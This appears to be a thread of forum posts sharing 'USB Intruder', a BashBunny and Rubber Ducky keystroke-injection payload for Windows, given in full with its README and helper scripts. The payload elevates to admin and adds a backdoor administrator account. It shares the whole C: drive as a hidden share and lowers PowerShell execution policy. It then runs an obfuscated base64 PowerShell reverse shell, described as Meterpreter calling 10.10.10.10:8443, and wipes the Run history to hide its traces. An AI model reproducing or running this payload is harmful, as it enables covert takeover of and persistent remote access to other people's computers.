B0rk

Exactly, that's why I was curious. I'm just not sure how exactly it could be done, but I was just thinking about it while I was trying to sleep last night. - Curiosity, nothing more.

Just curious if anyone knows if it would be possible to connect the BashBunny to multiple hosts simultaneously? I understand that the BashBunny probably wouldn't be able to run a normal payload (I.E. HID, Serial, etc.) to multiple systems at a time unless it was running as an Ethernet Adapter, but I was wondering if it is potentially possible as it can run a DHCP Server that can hand out multiple addresses. I.E. If you were able to obtain access to a server room or other location where there are multiple hosts that the BashBunny could be connected to at the same time (since servers are generally stacked in a rack) and have a payload execute upon issuing an address to said hosts. Maybe like using a USB Female to Female adapter connected to a USB Hub and using USB Male to Male cables to connect to the hosts. Just some food for thought and possible research. **Obviously, there would be some major research, scripting, and automation involved to create such a payload.

The shell script is meant to provide you with a shell into the "victim's" computer (research how reverse shell's work, there's tons of video's on youtube for it). You can also package an exe or any file of your choosing for your remote shell, just adjust the script(s) accordingly.

Hello all, I am posting the Ducky Script for the USB Intruder I made available on the BashBunny. If you would like to run USB Intruder on the TwinDuck FW, you will need to download the BashBunny payloads from Github and delete the payload.txt from the USB_Intruder payload folder and replace it with the following code for the inject.bin file. I'm being lazy on this post, so if you want more information on it, check the readme.md from my BB Payload. You will also need to name the storage "Ducky" (minus the quotes) in order for this payload to execute properly. DELAY 2000 GUI d DELAY 100 GUI r DELAY 500 STRING powershell -Command "Start-Process cmd -Verb RunAs" ENTER DELAY 1000 ALT y DELAY 800 STRING mkdir C:\Windows\ProgData ENTER STRING attrib +h C:\Windows\ProgData ENTER STRING powershell ENTER DELAY 800 STRING Set-ExecutionPolicy Unrestricted ENTER STRING powershell ".((gwmi win32_volume -f 'label=''Ducky''').Name+'\d.cmd')" ENTER DELAY 2000 STRING cd $Env:WinDir\ProgData ENTER STRING .\seq1.ps1 ENTER DELAY 1000 STRING powershell -WindowStyle Hidden $Env:WinDir\ProgData\shell.bat ENTER STRING exit ENTER STRING exit ENTER DELAY 500 GUI r DELAY 500 STRING powershell -WindowStyle Hidden Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue ENTER

It should only be blocking the shell.bat file as it is known by AV mfg's. It was only put on there as an example/placeholder (the LHOST is set to 10.10.10.10 and LPORT to 8443). It's just a Veil-Evasion generated payload. Everything else should execute just fine.

I will be updating my initial post with the new and updated scripts in the near future.

Thanks for the suggestion. I've cut down runtime by 13 or so seconds with that. I did have to keep the creation of the ProgData folder and Hidden attribute in the first part of the cmd prompt phase to allow for a destination of the initial copy, but I'll be updating this again in the near future. I left the shell.bat launch as is since it creates a separate hidden instance for it to run in rather than having it hanging up a script of scripts right at the end (since they're run sequentially).

Yes, it was created/tested post BB 1.3 FW upgrade.

You're going to love it (the bashbunny). I'll be modifying this payload in the future (maybe not the near future...) and adding to it as well. Feel free to hit me up on IRC or PM on here - goes for everyone.

It doesn't have to be a meterpreter payload, that's the beauty of it. That bat file (shell.bat) can be quite literally anything you want it to be and do what you want it to do. --Also, I know I'm using the old form of ducky script for the HID commands, but I wanted to make it cross platform and have the ability to be used on a TwinDucky as well.

Just a first script for the BB for me guys, chill and have an alco beverage or something. No need to get worked up. It's not necessarily meant for a corp env. I appreciate the constructive criticism, but I had fun and it was just a first step.

Posting for discussion and feedback. I will be submitting this for approval into the repository in the near future. I have attached a zip containing all necessary files as well for those of you that want to pick it up and run with it. Read the README below and in the zip first, and post any comments or questions you may have. -B0rk README.MD # USB Intruder for BashBunny and TwinDucky - Title: USB Intruder - Author: B0rk - Version: 1.0 - Target: Windows XP SP3+ - Props: Hak5Darren, Diggster, IMcPwn - Category: Infiltration/Execution ## Description Infiltrates a target system and performs the following: Creates a new user with the following credentials - pwnie:dungothacked Shares the root of the C: drive with full permissions to the new user pwnie with the label HACKED$ (Hidden) Created a hidden ProgData folder in the %UserProfile% Sets powershell execution to unrestricted Copies files from the USB_Intruder directory on the BashBunny to the hidden ProgData folder in the user profile Executes the eject.ps1 file that properly ejects the Mass Storage portion of the payload Executes a shell.bat file that is in fact a Meterpreter script calling back to the Attacker's Handler (not going into detail on how to do that) Cleans up the Run dialogue history **undo.bat is provided to reverse the first 3 actions above (in case you want to test)** **Be sure to have your handler ready to accept the incoming connection from the victim** ## Configuration Replace the shell.bat file in the USB_Intruder folder with your own custom Meterpreter script or what ever bat file you would like. **You will need to change delays accordingly to the profile of the victim's PC hardware.** ## STATUS | LED | Status | | --------------- | ---------------- | | Solid White | Initialization | | Blue Flashing | HID Phase 1 | | Solid Magenta | HID Phase 2 | | Red Flashing | Ejecting Storage | | Solid Cyan | HID Phase 3 | | Yellow Flashing | Cleanup of Run | | Green Flashing | Sync/EOF | | Solid Green | 100% Complete | payload.txt #!/bin/bash # #TITLE: USB Intruder #AUTHOR: B0rk #VERSION: 1.0 #PROPS: Hak5Darren, Diggster, IMcPwn #OS: Windows (Requires Powershell and Admin Rights) #ATTACKMODE: HID STORAGE # #DESCRIPTION: Opens up attack vectors and a meterpreter powershell script on a Victim PC. **Based on usb_exfiltrator by DK & Friends** # #LED INDICATORS: #White - Initialization #Blue Blinking - phase 1 #Magenta - phase 2 #Cyan - phase 3 #Yellow Blinking - Cleanup #Green - Attack Completion #Initialization - Setting AttackModes LED W ATTACKMODE HID STORAGE #Initialization Completed #Beginning of phase 1 LED B 10 #Sharing C Drive as HACKED$ and adding user pwnie with password of dungothacked to local Administrators group. #Also creates a new (hidden) folder in the current user's profile to drop files into for execution later on. Q DELAY 2000 Q GUI d Q DELAY 100 Q GUI r Q DELAY 500 Q STRING powershell -Command "Start-Process cmd -Verb RunAs" Q ENTER Q DELAY 800 Q ALT y Q DELAY 500 Q STRING net user pwnie dungothacked /add Q ENTER Q STRING net localgroup Administrators pwnie /add Q ENTER Q STRING net share HACKED$=C:\ /grant:pwnie,FULL Q ENTER Q STRING mkdir %UserProfile%\\ProgData Q ENTER Q STRING attrib +h %UserProfile%\\ProgData Q ENTER Q STRING powershell Q ENTER Q DELAY 500 Q STRING Set-ExecutionPolicy Unrestricted Q ENTER Q STRING exit Q ENTER Q STRING exit Q ENTER Q DELAY 500 #End of phase 1 #Beginning of phase 2 LED M #Copying Files from BashBunny to %UserProfile%\ProgData Q GUI r Q DELAY 500 Q STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" Q ENTER Q DELAY 2000 #End of phase 2 #Ejection of Mass Storage LED R 0 Q GUI d Q DELAY 250 Q GUI r Q DELAY 500 Q STRING powershell -Command "Start-Process cmd -Verb RunAs" Q ENTER Q DELAY 800 Q ALT y Q DELAY 800 Q STRING powershell Q ENTER Q DELAY 500 Q STRING cd \$Env:UserProfile\\ProgData Q ENTER Q STRING .\\eject.ps1 Q ENTER Q STRING exit Q ENTER Q STRING exit Q ENTER Q DELAY 500 #End of Ejection #Beginning of phase 3 LED C #Running PS script for Remote Shell from %UserProfile%\ProgData Directory. Q GUI r Q DELAY 500 Q STRING powershell -Command "Start-Process cmd -Verb RunAs" Q ENTER Q DELAY 800 Q ALT y Q DELAY 800 Q STRING powershell -windowstyle hidden \%userprofile%\\ProgData\\shell.bat Q ENTER Q DELAY 200 #End of phase 3 #Cleanup LED Y 100 #Clears complete run history Q GUI r Q DELAY 500 Q STRING powershell -WindowStyle Hidden Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue Q ENTER #End of Cleanup #Completion of script LED G 100 sync LED G #Completed d.cmd @echo OFF REM Setting dst to %BASHBUNNY%\Payload\$Switch_Position\USB_Intruder\ set dst=%~dp0USB_Intruder REM Copying files from dst to %USERPROFILE%\ProgData xcopy /C /Q /G /Y /S %dst%\*.* %USERPROFILE%\ProgData\ @cls @exit undo.bat (for undoing the first 3 actions of the payload **For Testing Purposes/Not Required**) net user pwnie /delete net share HACKED$ /delete RD /S /Q %UserProfile%\ProgData Inside the USB_Intruder folder: eject.ps1 $BB = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BASHBUNNY' } | Select-Object -First 1 -ExpandProperty Driveletter $driveEject = New-Object -comObject Shell.Application $driveEject.Namespace(17).ParseName("$BB").InvokeVerb("Eject") shell.bat (should be replaced with your own meterpreter script) @echo off if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") USB_Intruder.zip

Thank you Dice, your find assisted in the creation of a WORKING ps1 script. $BB = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BASHBUNNY' } | Select-Object -First 1 -ExpandProperty Driveletter $driveEject = New-Object -comObject Shell.Application $driveEject.Namespace(17).ParseName("$BB").InvokeVerb("Eject") I've tested it with multiple drive letters and it PROPERLY ejects the drive. THANK YOU TO EVERYONE WHO CONTRIBUTED! - I only hope that this helps for future payloads.

Dice, this does work for a Volume Letter (E:, D:, etc.), but I'm unable to get it to recognize a Volume Label such as 'BASHBUNNY'. Any ideas?

Actually, when you're ejecting the storage, it SHOULD only stop the storage attackmode, leaving HID or any other "non-ejectable" devices (attackmodes) still running from the BB payload. I'll play with this during the day and post said results here.

Thanks Sebkinne, looking forward to my first upload to the github repo here in the near future.

Is there any way to have the BashBunny safely eject on completion of the payload (on windows)? If so, how?

Hi res images of the PCB from my G drive. https://drive.google.com/open?id=0B69YY6swju_ZMXRBWVpUSHB4Y1U

I'll pop my defective one open tonight and let you know.

Didn't see the link till now, but I doubt that would work. That just makes my head hurt thinking of how to make the connection work properly even if we could supply power to it...

Yes, the LANTurtle is (basically) a micro PC (you can really make one [or at least kind of] from a Pi Zero [youtube "seytonic $7 LANTurtle"]). It would be feasible, but you have the potential to be fighting with the DHCP server of the network you're attacking. This attack could potentially work great for ARP poisoning though or remote shell access into a network.

Great Question, I don't believe that would be a possibility (out of the box) as the computer that the LAN Turtle is connected to is receiving it's information from the USB side of the adapter, and the Ethernet end is only being used for traffic to the computer. However, if you get into the LAN turtle via SSH you could more than likely change the configuration for the network adapters or payloads and possibly have the turtle do what you would like (but again, it would require re-configuring the adapters or payload on the turtle). -- I am not 100% certain of this, but this is what my logic is telling me (which sometimes is broken).

Has anyone installed expect (on the BB) and attempted scripting it into payloads? - Just trying to see if this is a feasible option for payloads.